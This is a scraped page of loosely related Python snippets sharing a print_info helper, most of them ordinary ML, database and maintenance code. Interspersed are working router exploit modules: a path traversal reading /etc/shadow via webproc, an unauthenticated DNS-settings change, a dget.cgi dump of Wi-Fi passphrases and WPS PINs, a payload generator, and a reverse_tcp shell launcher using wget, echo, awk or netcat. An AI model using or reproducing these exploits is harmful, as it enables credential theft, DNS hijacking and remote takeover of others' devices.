Example #1
0
def main():
    if not args.comments:
        raise errors.BadInputError("A comment describing/motivating " \
                    "the replacement must be provided!")

    # Connect to the database
    db = database.Database()
    db.connect()
    
    trans = db.begin() # Open a DB transaction
    try:
        verify_replacement(args.obsolete_id, args.replacement, db)
        replace_id = load_rawfile.load_rawfile(args.replacement, db)
        replace_rawfile(args.obsolete_id, replace_id, \
                            args.comments, db)
        utils.print_info("Successfully marked rawfile (ID: %d) and " \
                        "being superseded by a new rawfile (ID: %d)" % \
                        (args.obsolete_id, replace_id), 1)
    except:
        db.rollback()
        raise
    else:
        db.commit()
    finally:
        # Close DB connection
        db.close()
    def run(self, host, port, timeout):
        filename = input('Please input filename(default: /etc/shadow): ')
        if filename == '':
            filename = '/etc/shadow'

        url = "{}:{}/cgi-bin/webproc".format(host, port)
        data = {
            "getpage": "html/index.html",
            "*errorpage*": "../../../../../../../../../../..{}".format(filename),
            "var%3Amenu": "setup",
            "var%3Apage": "connected",
            "var%": "",
            "objaction": "auth",
            "%3Ausername": "******",
            "%3Apassword": "******",
            "%3Aaction": "login",
            "%3Asessionid": "abcdefgh"
        }

        # connection
        response, err = self.http_post(self.s, url, timeout, data)
        if err:
            self.print_requests_err(host, port, err)
            return

        if response.status_code == 200:
            utils.print_success("Exploit success")
            utils.print_info("File: {}".format(filename))
            utils.print_info(response.text)
        else:
            utils.print_failed("Exploit failed")
Example #3
0
    def login(self, host, port, timeout):
        url = 'http://{}:{}/'.format(host, port)
        resp, err = self.http_get(self.s, url, timeout)
        if err:
            self.print_requests_err(host, port, err)
            return False

        utils.print_info('"Retrieving random login token..."')
        token = self.regx_grab(resp.text, r'Frm_Logintoken"\)\.value = "(.*)";', 1)
        if token:
            utils.print_info(
                "Trying to log in with credentials {} : {}".format(self.username, self.password))
            url = 'http://{}:{}/'.format(host, port)
            data = {"Frm_Logintoken": token,
                    "Username": self.username,
                    "Password": self.password,
                    "action": "login"}
            resp, err = self.http_post(self.s, url, timeout, data)
            if err:
                utils.print_warning('{}:{} request error, msg: {}'.format(host, port, type(err).__name__))
                return False
            if "Username" not in resp.text and "Password" not in resp.text:
                utils.print_success("Successful authentication")
                return True
            else:
                return False
        else:
            utils.print_warning('Can not find the login token')
            return False
Example #4
0
def flatpak() -> None:
    if os.path.exists("/usr/bin/flatpak"):
        print_info("Updating Flatpak apps")
        # Flatpak may return a non-zero exit code even when it's capable of installing the updates.
        run(["flatpak", "update"], check=False)
    else:
        print_info("flatpak not found")
Example #5
0
def trim() -> None:
    if os.path.exists("/sbin/fstrim"):
        print_info("Running fstrim")
        run(["fstrim", "-a", "-v"], sudo=True)
        # run(["fstrim", "/", "-v"])
    else:
        print_info("fstrim not found")
Example #6
0
  def _build_encoder(self):
    """Construct encoder network: placeholders, operations, optimizer"""
    self._input = tf.placeholder(tf.float32, self._batch_shape, name='input')
    self._encoding = tf.placeholder(tf.float32, (FLAGS.batch_size, self.layer_narrow), name='encoding')

    self._encode = (pt.wrap(self._input)
                    .flatten()
                    .fully_connected(self.layer_encoder, name='enc_hidden')
                    .fully_connected(self.layer_narrow, name='narrow'))

    self._encode = pt.wrap(self._input)
    self._encode = self._encode.conv2d(5, 32, stride=2)
    print(self._encode.get_shape())
    self._encode = self._encode.conv2d(5, 64, stride=2)
    print(self._encode.get_shape())
    self._encode = self._encode.conv2d(5, 128, stride=2)
    print(self._encode.get_shape())
    self._encode = (self._encode.dropout(0.9).
                    flatten().
                    fully_connected(self.layer_narrow, activation_fn=None))

    # variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=self.encoder_scope)
    self._encoder_loss = self._encode.l1_regression(pt.wrap(self._encoding))
    ut.print_info('new learning rate: %.8f (%f)' % (FLAGS.learning_rate/FLAGS.batch_size, FLAGS.learning_rate))
    self._opt_encoder = self._optimizer(learning_rate=FLAGS.learning_rate/FLAGS.batch_size)
    self._train_encoder = self._opt_encoder.minimize(self._encoder_loss)
Example #7
0
  def train(self, epochs_to_train=5):
    meta = self.get_meta()
    ut.print_time('train started: \n%s' % ut.to_file_name(meta))
    ut.configure_folders(FLAGS, meta)

    self.fetch_datasets(self._activation)
    self.build_model()
    self._register_training_start()

    with tf.Session() as sess:
      sess.run(tf.initialize_all_variables())
      self._saver = tf.train.Saver()

      if FLAGS.load_state and os.path.exists(self.get_checkpoint_path()):
        self._saver.restore(sess, self.get_checkpoint_path())
        ut.print_info('Restored requested. Previous epoch: %d' % self.get_past_epochs(), color=31)

      # MAIN LOOP
      for current_epoch in xrange(epochs_to_train):
        start = time.time()
        feed = self._get_epoch_dataset()
        for _, batch in enumerate(feed):

          encoding, reconstruction, loss, _, _ = sess.run(
            [self._encode, self._decode, self._reco_loss, self._train, self._step],
            feed_dict={self._input: batch[0], self._reconstruction: batch[0]})
          self._register_batch(loss)
        self._register_epoch(current_epoch, epochs_to_train, time.time()-start, sess)
      self._writer = tf.train.SummaryWriter(FLAGS.logdir, sess.graph)
      meta = self._register_training()
    return meta, self._stats['epoch_accuracy']
Example #8
0
def pretrain():
    utils.print_info("Start pretraining...")
    for epoch in range(args.pre_train_epoch):
        start_time, loss, n = time.time(), 0., 0
        for x, _ in real_dataloader:
            x = x.to(device)

            pre_gen_optimizer.zero_grad()
            x_features = vgg_net(x)
            gen_x = gen_net(x)
            gen_x_features = vgg_net(gen_x)

            c_loss = con_loss(gen_x_features, x_features.detach())
            c_loss.backward()
            pre_gen_optimizer.step()

            loss += c_loss.item()
            n += 1

        print("Epoch: {:3d}, con_loss: {:3.3f}, time: {:3.3f} secs".format(
            epoch + 1, loss / n,
            time.time() - start_time))
    generator_image(pretrain_outputs_path, 5)
    save_pth("gen")
    utils.print_info("Pretrain done.")
Example #9
0
def list_whitelisted_jurisdictions():
    jurisdictions = utils.get_jurisdictions()
    utils.print_info("Whitelisted jurisdictions")
    for jurisdiction in jurisdictions:
        if jurisdiction["whitelisted"]:
            print(jurisdiction['name_long'])
    return jurisdictions
Example #10
0
def get_input_name(input_folder):
  spliter = '/img/' if '/img/' in input_folder else '/dep/'
  main_part = input_folder.split(spliter)[0]
  name = main_part.split('/')[-1]
  name = name.replace('.tar.gz', '')
  ut.print_info('input folder: %s -> %s' % (input_folder.split('/'), name))
  return name
Example #11
0
    def show(self):
        utils.print_help('Target info:')
        i = 0
        x = PrettyTable()
        x.field_names = ['index', 'host', 'port', 'brand', 'alternative', 'affective']
        for target in self.__targets:
            # utils.print_info(' ' * 4 + utils.Color.GREEN + str(i) + ': ' + utils.Color.ENDC +
            #                  target.host + ':' + str(target.port) +
            #                  ', ' + utils.Color.GREEN + 'brand: ' + utils.Color.ENDC + (
            #                  'unknown' if not target.brand else target.brand) +
            #                  ', ' + utils.Color.GREEN + 'alternative exploit: ' + utils.Color.ENDC + (
            #                  '[]' if not target.alternative_exploit else str(target.alternative_exploit)) +
            #                  ', ' + utils.Color.GREEN + 'affective exploit: ' + utils.Color.ENDC +
            #                  '[]' if not target.affective_exploit else str(target.affective_exploit))
            x.add_row([i, target.host, target.port, target.brand, target.alternative_exploit, target.affective_exploit])
            i += 1
        utils.print_info(x)

        if self.get_current():
            utils.print_help('Current: ', end='')
            utils.print_info(str(self.get_current().host))
        utils.print_help('Threads: ', end='')
        utils.print_info(str(self.__threads))
        utils.print_help('Timeout: ', end='')
        utils.print_info(str(self.__timeout))
        utils.print_help('Output: ', end='')
        utils.print_info(None if not self.__output else self.__output)
def launch_seishub_server(debug=False):
    """
    Launches the SeisHub instance, loops until the startup sequence is finished
    and returns the process object.

    :param debug: If debug is True, the output will not be catched.
    """
    print_info("Starting SeisHub Server...")

    if debug is True:
        proc = subprocess.Popen(os.path.join(BIN_DIR, "debug.sh"), shell=True)
    else:
        proc = subprocess.Popen(os.path.join(BIN_DIR, "debug.sh"), shell=True,
                stdout=subprocess.PIPE, stderr=subprocess.STDOUT)

    # Ping the server for up to ten seconds. This should assure it has started.
    t = time.time()
    while (time.time() - t) < 10.0:
        try:
            urllib2.urlopen(BASE_URL).read()
            break
        except Exception, e:
            if hasattr(e, "code"):
                break
            time.sleep(0.25)
Example #13
0
    def do_result(self, *args):
        x = PrettyTable()
        x.field_names = ['host', 'port', 'brand', 'module', 'extra', 'exploit']
        for result in self.last_result:
            x.add_row(result)

        utils.print_info(x)
Example #14
0
    def _data(self):
        print_info('==> Preparing data..')
        transform_train = transforms.Compose([
            transforms.RandomCrop(32, padding=4),
            transforms.RandomHorizontalFlip(),
            transforms.ToTensor(),
            transforms.Normalize((0.4914, 0.4822, 0.4465),
                                 (0.2023, 0.1994, 0.2010))
        ])
        transform_test = transforms.Compose([
            transforms.ToTensor(),
            transforms.Normalize((0.4914, 0.4822, 0.4465),
                                 (0.2023, 0.1994, 0.2010))
        ])

        train_set = torchvision.datasets.CIFAR10(self.root_path,
                                                 train=True,
                                                 download=True,
                                                 transform=transform_train)
        _train_loader = torch.utils.data.DataLoader(train_set,
                                                    batch_size=self.batch_size,
                                                    shuffle=True,
                                                    num_workers=2)

        test_set = torchvision.datasets.CIFAR10(self.root_path,
                                                train=False,
                                                download=True,
                                                transform=transform_test)
        _test_loader = torch.utils.data.DataLoader(test_set,
                                                   batch_size=100,
                                                   shuffle=False,
                                                   num_workers=2)

        return _train_loader, _test_loader
Example #15
0
    def train(self, epoch, change_lr=False):
        print()
        print_info('Epoch: %d' % epoch)

        if change_lr:
            self._change_lr(epoch)

        self.net.train()
        train_loss = 0
        correct = 0
        total = 0
        for batch_idx, (inputs, targets) in enumerate(self.train_loader):
            inputs, targets = inputs.to(self.device), targets.to(self.device)
            self.optimizer.zero_grad()
            outputs = self.net(inputs)
            loss = self.criterion(outputs, targets)
            loss.backward()
            self.optimizer.step()

            train_loss += loss.item()
            _, predicted = outputs.max(1)
            total += targets.size(0)
            correct += predicted.eq(targets).sum().item()
            pass
        print_info('Loss: %.3f | Acc: %.3f%% (%d/%d)' %
                   (train_loss / len(self.train_loader),
                    100. * correct / total, correct, total))
        pass
Example #16
0
    def run(self):
        print_status("Generating payload")
        try:
            data = self.generate()
        except OptionValidationError as e:
            print_error(e)
            return

        if self.output == "elf":
            with open(self.filepath, 'w+') as f:
                print_status("Building ELF payload")
                content = self.generate_elf(data)
                print_success("Saving file {}".format(self.filepath))
                f.write(content)
        elif self.output == "c":
            print_success("Bulding payload for C")
            content = self.generate_c(data)
            print_info(content)
        elif self.output == "python":
            print_success("Building payload for python")
            content = self.generate_python(data)
            print_info(content)
        else:
            raise OptionValidationError(
                "No such option as {}".format(self.output)
            )
Example #17
0
def clean_hot_bins(ar, thresh=2.0):
    subintdata = get_subints(ar, remove_prof=True)
    subintweights = get_subint_weights(ar).astype(bool)

    # re-disperse archive because subintdata is at DM=0
    orig_dm = ar.get_dispersion_measure()
    ar.set_dispersion_measure(0)
    ar.dedisperse()

    # Clean hot bins
    for isub, subintweight in enumerate(subintweights):
        if subintweight:
            # Identify hot bins
            subint = subintdata[isub, :]
            hot_bins = get_hot_bins(subint, normstat_thresh=thresh)[0]
            utils.print_info(
                "Cleaning %d bins in subint# %d" % (len(hot_bins), isub), 2)
            if len(hot_bins):
                clean_subint(ar, isub, hot_bins)
        else:
            # Subint is masked. Nothing to do.
            pass

    # Re-dedisperse data using original DM
    ar.set_dispersion_measure(orig_dm)
    ar.dedisperse()
Example #18
0
    def run(self, host, port, timeout):
        # TODO NOT TESTING
        if self.primary_dns == '':
            p_dns = input('Please input the PRIMARY DNS: ')
            if utils.valid_host(p_dns):
                self.primary_dns = p_dns
            else:
                self.run(host, port, timeout)

        if self.second_dns == '':
            s_dns = input('Please input the SECOND DNS: ')
            if utils.valid_host(s_dns):
                self.second_dns = s_dns
            else:
                self.run(host, port, timeout)

        utils.print_info('Using PRIMARY DNS: {}, SECOND DNS: {}'.format(
            self.primary_dns, self.second_dns))
        if self.input_to_continue():
            url = "http://{}:{}/ddnsmngr.cmd?action=apply&service=0&enbl=0&" \
                  "dnsPrimary={}&dnsSecondary={}&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP" \
                .format(host, port, self.primary_dns, self.second_dns)
            resp, err = self.http_post(self.s, url, timeout, None)
            if err:
                self.print_requests_err(host, port, err)
                return
            if resp.status_code == 200:
                utils.print_success("DNS settings has been changed")
            else:
                utils.print_failed("Could not change DNS settings")
        else:
            self.primary_dns = ''
            self.second_dns = ''
Example #19
0
def table1_exp1(folds_dir):
    utils.print_success("Experiment 1 in Table 1")
    fn_gts = "groundtruths/database1.csv"
    gts = utils.read_groundtruths(fn_gts)
    res_files = [
        name for name in os.listdir(folds_dir)
        if os.path.isfile(os.path.join(folds_dir, name)) and "results" in name
    ]
    acc = []
    f1 = []
    for res in res_files:
        predictions = []
        groundtruths = []
        preds = read_preds(folds_dir + res)
        for name in preds:
            name_gts = name.split(".")[0]
            if name_gts in gts:
                groundtruths.append(gts[name_gts])
                predictions.append(preds[name])
        acc.append(accuracy_score(groundtruths, predictions))
        predictions = [1 if i == "s" else 0 for i in predictions]
        groundtruths = [1 if i == "s" else 0 for i in groundtruths]
        f1.append(f1_score(groundtruths, predictions, average='binary'))
    # Print average ± standard deviation
    utils.print_info("Accuracy " + str(sum(acc) / float(len(acc))) + " ± " +
                     str(stdev(acc)))
    utils.print_info("F-Measure " + str(sum(f1) / float(len(f1))) + " ± " +
                     str(stdev(f1)))
    dir_res = utils.create_dir("stats/")
    with open(dir_res + "table1_accuracy.csv", "a") as filep:
        for val in acc:
            filep.write("SVMBFF," + str(val) + "\n")
    with open(dir_res + "table1_f1.csv", "a") as filep:
        for val in f1:
            filep.write("SVMBFF," + str(val) + "\n")
Example #20
0
def lp_svrg_baseline(d, model):
    w_tilde = None
    g_tilde = None

    for epoch in range(0, d.num_epochs):
        if epoch % d.T == 0:
            w_tilde = np.copy(model.lin_layer.weight.data())
            cost = model.forward(d.x_train, d.y_train)
            model.backward()
            g_tilde = np.copy(model.lin_layer.weight.offset_grad)

        cost = 0
        for batch_index in range(0, d.num_batches):
            x, y = d.get_data(batch_index)

            w_offset = np.copy(model.lin_layer.weight.offset)
            np.copyto(model.lin_layer.weight.offset, w_tilde)

            model.forward_lp(x, y)
            model.backward_lp()
            w_tilde_grad = np.copy(model.lin_layer.weight.offset_grad)

            np.copyto(model.lin_layer.weight.offset, w_offset)
            cost += model.forward_lp(x, y)
            model.backward_lp()
            model.step_svrg_lp(w_tilde_grad, g_tilde)

        predY = model.predict(d.x_test)
        utils.print_info(epoch, cost / d.num_batches,
                         100 * np.mean(predY == d.y_test))
Example #21
0
 def run(self, host, port, timeout):
     if self.check(host, port, timeout):
         t = prettytable.PrettyTable()
         t.field_names = ['Username', 'Password']
         for c in self.info:
             t.add_row([c[0], c[1]])
         utils.print_info(t)
Example #22
0
    def check(self, host, port, timeout):
        utils.print_info('Use username: {}, password: {}'.format(self.username, self.password))
        if self.input_to_continue():
            if self.login(host, port, timeout):
                url = self.check_url.format(host, port)
                resp, err = self.http_get(self.s, url, timeout)
                if err:
                    self.print_requests_err(host, port, err)
                    self.print_check_result(False, host)
                else:
                    textarea_1_match = re.compile(r'textarea cols="" rows="" class="textarea_1"', re.S).search(resp.text)
                    if textarea_1_match:
                        self.print_check_result(True, host)
                        return True
                    else:
                        utils.print_warning('Device is busy, please wait')
                        return False
            else:
                utils.print_failed('Login failed')
                self.print_check_result(False, host)
                return False
        else:
            self.set_credits()
            return self.check(host, port, timeout)

        return False
Example #23
0
    def start(self):
        """
        Start processing the log file.
        """
        print_info(f"Start monitoring {self.log_file}")
        with open(self.log_file) as log_file:
            reader = DictReader(log_file)

            # Keep track of the number of requests in the log window.
            request_counts = []
            while True:
                try:
                    timestamp, average_bytes, most_hit_section, count = self.read_logs(reader, self.log_interval)
                    print_info(f"{timestamp}\t{average_bytes:.2f}\t{most_hit_section}")

                    request_counts.append(count)
                    # Only keep enough counts to cover the time in the log window.
                    request_counts = request_counts[-(self.log_window // self.log_interval):]
                    requests_per_second = sum(request_counts) / self.log_window

                    # Check if the requests per second has exceeded or recovered from the traffic threshold.
                    if requests_per_second >= self.threshold and self.high_traffic is False:
                        print_error(f"High traffic generated an alert - hits = {requests_per_second:.2f} requests per "
                                    f"second, triggered at {timestamp}")
                        self.high_traffic = True
                    elif requests_per_second < self.threshold and self.high_traffic is True:
                        print_success(f"Traffic has stabilized - hits = {requests_per_second:.2f} requests per second, "
                                      f"recovered at {timestamp}")
                        self.high_traffic = False

                    # Simulate time passing. DO NOT USE for real access logs.
                    time.sleep(self.log_interval)
                except StopIteration:
                    print_warning("End of file has been reached.")
                    break
Example #24
0
def list_blacklisted_jurisdictions():
    utils.print_info("Blacklisted jurisdictions")
    jurisdictions = utils.get_jurisdictions()
    for jurisdiction in jurisdictions:
        if not jurisdiction["whitelisted"]:
            print(jurisdiction['name_long'])
    return jurisdictions
    def run(self, host, port, timeout):
        # TODO NOT TESTING
        if self.info is None:
            url = "http://{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase," \
                  "wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list," \
                  "get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode," \
                  "get_wps_enable,get_wps_current_time&_=1458458152703" \
                .format(host, port)

            resp, err = self.http_get(self.s, url, timeout)
            if err is None:
                if resp.status_code == 200:
                    try:
                        self.info = json.loads(resp.text)
                    except ValueError:
                        pass

        if self.info and len(self.info):
            utils.print_success('Exploit success')
            t = prettytable.PrettyTable()
            t.add_column('Key', list(self.info.keys()))
            t.add_column('Value', list(self.info.values()))
            utils.print_info(t)
            utils.logger.send((host, port, t))

        utils.print_failed('Exploit failed')
Example #26
0
def is_funny(n):
    if n in FUNNY:
        return True
    elif n == 0 or n in UNFUNNY:
        return False
    funni = 0
    # If the number is a multiple of any funny number, add 1 funni point per funny number that it is divisible by.
    funni += len(get_divisors(n, FUNNY))
    # If the number is a multiple of any unfunny number, subtract 1 funni point per unfunny number that it is divisible by.
    funni -= len(get_divisors(n, UNFUNNY))
    # If the number is even subtract one funni point, otherwise add 1 funni point.
    if n % 2 == 0:
        funni -= 1
    else:
        funni += 1
    # If the number is prime, add 2 funni points.
    if is_prime(n):
        funni += 2
    # If the number is a perfect square, subtract 2 funni points.
    root = sqrt(n)
    if root == int(root):
        funni -= 2
        # If the number is the square of a prime, subtract another 2 funni points.
        if is_prime(root):
            funni -= 2
    print_info(funni)
    return funni > 0
Example #27
0
    def post(self):
        current_path = os.path.dirname(os.path.realpath(__file__))
        # global options
        data = Configurations.parser.parse_args()
        options = data['options']

        utils.just_write(current_path + '/storages/options.json', options, is_json=True)

        if options.get('FORCE') == "False":
            old_log = options['WORKSPACE'] + '/log.json'
            if utils.not_empty_file(old_log) and utils.reading_json(old_log):
                utils.print_info(
                    "It's already done. use '-f' options to force rerun the module")

                raw_activities = utils.reading_json(
                    options['WORKSPACE'] + '/log.json')
                utils.just_write(current_path + '/storages/activities.json',
                                 raw_activities, is_json=True)

                return options

        
        utils.print_info("Cleasning activities log")
        #Create skeleton activities
        commands = utils.reading_json(current_path + '/storages/commands.json')
        raw_activities = {}
        for k,v in commands.items():
            raw_activities[k] = []
        utils.just_write(current_path + '/storages/activities.json',
                         raw_activities, is_json=True)

        return options
Example #28
0
def get_input_name(input_folder):
    spliter = '/img/' if '/img/' in input_folder else '/dep/'
    main_part = input_folder.split(spliter)[0]
    name = main_part.split('/')[-1]
    name = name.replace('.tar.gz', '')
    ut.print_info('input folder: %s -> %s' % (input_folder.split('/'), name))
    return name
Example #29
0
    def run(self):
        print_status("Generating payload")
        try:
            data = self.generate()
        except OptionValidationError as e:
            print_error(e)
            return

        if self.output == "elf":
            with open(self.filepath, 'w+') as f:
                print_status("Building ELF payload")
                content = self.generate_elf(data)
                print_success("Saving file {}".format(self.filepath))
                f.write(content)
        elif self.output == "c":
            print_success("Bulding payload for C")
            content = self.generate_c(data)
            print_info(content)
        elif self.output == "python":
            print_success("Building payload for python")
            content = self.generate_python(data)
            print_info(content)
        else:
            raise OptionValidationError("No such option as {}".format(
                self.output))
def print_data(data, fig, subplot, is_3d=True):
    colors = np.arange(0, 180)
    colors = np.concatenate((colors, colors[::-1]))
    colors = vi._duplicate_array(colors, total_length=len(data))

    if is_3d:
        subplot = fig.add_subplot(subplot, projection='3d')
        subplot.set_title('All data')
        subplot.scatter(data[:, 0],
                        data[:, 1],
                        data[:, 2],
                        c=colors,
                        cmap=plt.cm.Spectral,
                        picker=5)
    else:
        subsample = data[0:360] if len(data) < 2000 else data[0:720]
        subsample = np.concatenate(
            (subsample, subsample))[0:len(subsample) + 1]
        ut.print_info('subsample shape %s' % str(subsample.shape))
        subsample_colors = colors[0:len(subsample)]
        subplot = fig.add_subplot(subplot)
        subplot.set_title('First 360 elem')
        subplot.plot(subsample[:, 0], subsample[:, 1], picker=0)
        subplot.plot(subsample[0, 0], subsample[0, 1], picker=0)
        subplot.scatter(subsample[:, 0],
                        subsample[:, 1],
                        s=50,
                        c=subsample_colors,
                        cmap=plt.cm.Spectral,
                        picker=5)
    return subplot
Example #31
0
    def do_check(self, arg):
        utils.print_info('checking if module loaded')
        if not self.check_module_loaded():
            utils.print_failed(
                'checking module failed\n'
                'Please make sure you have already choose one module')
            return

        utils.print_info('checking targets info')
        if not self.check_target_arg():
            utils.print_failed('checking targets info failed\n'
                               'Please make sure you input info target info')
            return
        else:
            utils.print_success('passing checking...')
        target = self.task.get_current()
        if self.module.check(target.host, target.port,
                             self.task.get_timeout()):
            module_name = inspect.getmodule(self.module).__name__[16:]
            exploits = target.affective_exploit
            if not exploits:
                a_exploit = [module_name]
            else:
                if module_name not in exploits:
                    a_exploit = exploits.append(module_name)
                else:
                    a_exploit = exploits
            self.task.set_current(
                ExploitTarget(host=target.host,
                              port=target.port,
                              brand=target.brand,
                              alternative_exploit=target.alternative_exploit,
                              affective_exploit=a_exploit))
def experiment_2():
    utils.print_success("Experiment 2")
    groundtruths_file = "groundtruths/database2.csv"
    dir_pred = "predictions/"
    predictions_files = os.listdir(dir_pred)
    gts = read_item_tag(groundtruths_file)
    for pred_file in predictions_files:
        algo_name = pred_file.split("/")[-1][:-4]
        utils.print_info(algo_name)
        if "Ghosal" in algo_name:
            # Change threshold as RANSAC does not produces pred in [0;1] 
            threshold = 0.
        else:
            threshold = 0.5
        test_groundtruths = []
        predictions = []
        with open(dir_pred + pred_file, "r") as filep:
            for line in filep:
                row = line[:-1].split(",")
                isrc = row[0]
                if isrc in gts:
                    test_groundtruths.append(gts[isrc]) 
                    predictions.append("s" if float(row[1]) > threshold else "i")
        results_experiment_2(algo_name, predictions, test_groundtruths)

    algo_name = "Random"
    utils.print_info(algo_name)
    test_groundtruths = ["s", ] * test_groundtruths.count("s") + ["i", ] * test_groundtruths.count("i")
    predictions = ["s", "i", ] * int(len(test_groundtruths)/2)
    if len(test_groundtruths) % 2:
        predictions += ["s"]
    results_experiment_2(algo_name, predictions, test_groundtruths)
Example #33
0
    def _build_encoder(self):
        """Construct encoder network: placeholders, operations, optimizer"""
        self._input = tf.placeholder(tf.float32,
                                     self._batch_shape,
                                     name='input')
        self._encoding = tf.placeholder(tf.float32,
                                        (FLAGS.batch_size, self.layer_narrow),
                                        name='encoding')

        self._encode = (pt.wrap(self._input).flatten().fully_connected(
            self.layer_encoder,
            name='enc_hidden').fully_connected(self.layer_narrow,
                                               name='narrow'))

        self._encode = pt.wrap(self._input)
        self._encode = self._encode.conv2d(5, 32, stride=2)
        print(self._encode.get_shape())
        self._encode = self._encode.conv2d(5, 64, stride=2)
        print(self._encode.get_shape())
        self._encode = self._encode.conv2d(5, 128, stride=2)
        print(self._encode.get_shape())
        self._encode = (self._encode.dropout(0.9).flatten().fully_connected(
            self.layer_narrow, activation_fn=None))

        # variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=self.encoder_scope)
        self._encoder_loss = self._encode.l1_regression(pt.wrap(
            self._encoding))
        ut.print_info(
            'new learning rate: %.8f (%f)' %
            (FLAGS.learning_rate / FLAGS.batch_size, FLAGS.learning_rate))
        self._opt_encoder = self._optimizer(learning_rate=FLAGS.learning_rate /
                                            FLAGS.batch_size)
        self._train_encoder = self._opt_encoder.minimize(self._encoder_loss)
Example #34
0
def shell(exploit, architecture="", method="", **params):
    while 1:
        cmd = input("cmd > ")

        if cmd in ["quit", "exit"]:
            return

        c = cmd.split()
        if len(c) and c[0] == "reverse_tcp":
            if len(c) == 3:
                lhost = c[1]
                lport = c[2]

                revshell = ReverseShell(exploit, architecture, lhost, lport)

                if method == "wget":
                    revshell.wget(binary=params['binary'],
                                  location=params['location'])
                elif method == "echo":
                    revshell.echo(binary=params['binary'],
                                  location=params['location'])
                elif method == "awk":
                    revshell.awk(binary=params['binary'])
                elif method == "netcat":
                    revshell.netcat(binary=params['binary'],
                                    shell=params['shell'])
                else:
                    print_failed("Reverse shell is not available")
            else:
                print_failed("reverse_tcp <reverse ip> <port>")
        else:
            print_info(exploit.execute(cmd))
Example #35
0
def main():
    # Collect input files
    infiles = set(args.infiles)
    for glob_expr in args.glob_exprs:
        infiles.update(glob.glob(glob_expr))
    infiles = list(infiles)

    if not infiles:
        sys.stderr.write("You didn't provide any files to load. " \
                         "You should consider including some next time...\n")
        sys.exit(1)
    
    # Enter information in rawfiles table
    # create diagnostic plots and metrics.
    # Also fill-in raw_diagnostics and raw_diagnostic_plots tables
    for fn in infiles:
        try:
            if config.cfg.verbosity:
                print "Checking %s (%s)" % (fn, utils.give_utc_now())

            # Check the file and parse the header
            params = utils.prep_file(fn)
            
            # Find where the file will be moved to.
            destdir = utils.get_archive_dir(fn, params=params)
            
            utils.print_info("%s will get archived to %s (%s)" % \
                        (fn, destdir, utils.give_utc_now()), 1)

            utils.print_info("Finished with %s - pre-check successful (%s)" % \
                        (fn, utils.give_utc_now()), 1)

        except errors.ToasterError, msg:
            sys.stderr.write("Pre-check of %s failed!\n%s\nSkipping...\n" % \
                                (fn, msg))
Example #36
0
def get_next_batch(batch_size):
    """批量处理训练

    通过测试发现,多进程和多线程的情况下,速度并没有更快

    :param batch_size: 验证码数量
    :type batch_size int

    :return batch_x
    :rtype batch_x numpy.ndarray

    :return batch_y
    :rtype batch_y numpy.ndarray
    """
    batch_x = np.zeros([batch_size, IMAGE_HEIGHT * IMAGE_WIDTH])
    batch_y = np.zeros([batch_size, MAX_CAPTCHA * CHAR_SET_LEN])
    for i in range(batch_size):
        text, file_path, image = wrap_gen_captcha_text_and_image()

        # 删除文件
        os.remove(file_path)

        if i % 10 == 0:
            print_info("\ngenerate captcha: {}".format(text), newline=False)
        else:
            print_info(text, newline=False)
        image = convert2gray(image)

        batch_x[
            i, :] = image.flatten() / 255  # (image.flatten()-128)/128  mean为0
        batch_y[i, :] = text2vec(text)

    return batch_x, batch_y
Example #37
0
def svrg_bitcentering(d, model):
    g_tilde = None
    cost = 0
    for epoch in range(0, d.num_epochs):
        if epoch % d.T == 0:
            model.recenter()
            cost = model.forward(d.x_train, d.y_train)
            model.backward()
            g_tilde = np.copy(model.lin_layer.weight.offset_grad)

            # Cache the results.
            for batch_index in range(0, d.num_batches):
                x, y = d.get_data(batch_index)
                model.forward_store(x, y, batch_index)
                model.backward_store(batch_index)

        cost = 0
        for batch_index in range(0, d.num_batches):
            x, y = d.get_data(batch_index)

            cost += model.forward_inner(x, y, batch_index)
            model.backward_inner(batch_index)
            model.step_svrg_inner(g_tilde, batch_index)

        predY = model.predict_inner(d.x_test)
        utils.print_info(epoch, cost / d.num_batches,
                         100 * np.mean(predY == d.y_test))
def init_seishub_instance(debug=False):
    """
    Creates a new SeisHub instance at TEST_DIRECTORY.

    :param debug: If debug is True, the output will not be catched.
    """
    print_info("Creating new SeisHub instance in %s..." % TEST_DIRECTORY)

    if os.path.exists(TEST_DIRECTORY):
        msg = "SeisHub temp directory already exists."
        print_error(msg)
        sys.exit(1)

    cmd = ["seishub-admin", "initenv", TEST_DIRECTORY]
    try:
        if debug is True:
            subprocess.call(cmd)
        else:
            subprocess.check_output(cmd, stderr=subprocess.STDOUT)
    except subprocess.CalledProcessError, e:
        print_error("Error creating seishub instance. Exited with return "
            "code %s. Full output follows:" % (str(e.returncode)))
        print ""
        print e.output
        print ""
        sys.exit(1)
Example #39
0
 def set_layer_sizes(self, h):
   if isinstance(h, str):
     ut.print_info('new layer sizes: %s' % h)
     h = h.replace('/', '|')
     h = list(map(int, h.split('|')))
   self.layers = h
   self.layer_narrow = np.argmin(h)
   print(self.layers, self.layer_narrow)
Example #40
0
def visualize_latest_from_visualization_folder(folder='./visualizations/', file=None):
  if file is None:
    file = ut.get_latest_file(folder, filter=r'.*\d+\.txt$')
    ut.print_info('Encoding file: %s' % file.split('/')[-1])
  data = np.loadtxt(file)  # [0:360]
  fig = plt.figure()
  vi.visualize_encodings(data, fast=fast, fig=fig,  interactive=True)
  fig.suptitle(file.split('/')[-1])
  fig.tight_layout()
  plt.show()
Example #41
0
def search_learning_rate(lrs=[100, 5, 0.5, 0.1, 0.01, 0.001], epochs=None):
    best_q, best_r = None, None
    res = []
    for lr in lrs:
        q = main(learning_rate=lr) if epochs is None else main(learning_rate=lr, epochs=epochs)
        res.append('\n\r lr:%.4f \tq:%.2f' % (lr, q))
        if best_q is None or best_q > q:
            best_q = q
            best_r = lr
    print(''.join(res))
    ut.print_info('BEST Q: %d IS ACHIEVED FOR LR: %f' %(best_q, best_r), 36)
Example #42
0
def rescale_ds(ds, min, max):
  ut.print_info('rescale call: (min: %s, max: %s) %d' % (str(min), str(max), len(ds)))
  if max is None:
    return np.asarray(ds) - np.min(ds)
  ds_min, ds_max = np.min(ds), np.max(ds)
  ds_gap = ds_max - ds_min
